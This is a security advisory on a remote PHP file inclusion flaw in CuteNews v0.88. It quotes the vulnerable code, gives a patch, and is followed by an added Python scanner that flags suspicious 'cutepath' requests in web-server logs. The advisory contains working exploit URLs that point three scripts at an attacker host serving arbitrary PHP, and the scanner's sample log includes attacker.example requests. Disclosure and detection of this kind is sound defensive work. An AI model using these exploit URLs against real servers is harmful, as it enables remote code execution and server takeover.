PHP source code injection in CuteNews

Information :
===============================================
Script : CuteNews v0.88
Official site : http://air.langame.net/
===============================================
PHP Scripts :
===============================================
shownews.php :

if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");
===============================================
search.php :

require_once("$cutepath/config.php");
===============================================
comments.php :

if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
===============================================
Exploits :

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/

with :

http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt

Content of config.php or news.txt: any PHP code.
===============================================
Patch :

Replace

if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");

with

$cutepath=".";
===============================================
Best Regards,
Over_G [DWC Gr0up] and VenoM

Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG@mail.ru VenoM88@mail.ru
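
A defender-side check for the request pattern described in this advisory, as an added example that is not part of the original advisory or of CuteNews: it scans web-server access-log lines for requests to the three affected scripts that supply cutepath in the query string. The log lines, client addresses and host names are constructed; the common/combined log format and the premise that no legitimate client ever sets cutepath are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameter named in the advisory.
SCRIPTS = {"shownews.php", "search.php", "comments.php"}
PARAM = "cutepath"

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
# Value begins with a URL scheme (http://, ftp://, ...) or with //host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.I)

# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2004:10:01:07 +0000] "GET /cutenews/shownews.php?id=5 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [12/Mar/2004:10:02:31 +0000] "GET /cutenews/shownews.php?cutepath=http://attacker.example/ HTTP/1.0" 200 311',
    '198.51.100.7 - - [12/Mar/2004:10:02:40 +0000] "GET /cutenews/search.php?cutepath=http%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 298',
    '203.0.113.4 - - [12/Mar/2004:10:05:12 +0000] "GET /cutenews/comments.php?cutepath=. HTTP/1.0" 200 4077',
    '192.0.2.10 - - [12/Mar/2004:10:06:00 +0000] "GET /index.php?cutepath=http://attacker.example/ HTTP/1.0" 404 210',
]


def classify(line):
    """Return (client, script, verdict, value) if the line sets cutepath, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return None
    # parse_qsl percent-decodes once, which is the value PHP would see.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == PARAM:
            verdict = "remote-include" if REMOTE_RE.match(value) else "path-override"
            return (client, script, verdict, value)
    return None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, script, verdict, value in scan(SAMPLE_LOG):
        print(f"{verdict:15} {client:15} {script:13} cutepath={value!r}")
```

A hit on an installation that has not been patched as described above warrants checking the server for files or changes made after the logged request time.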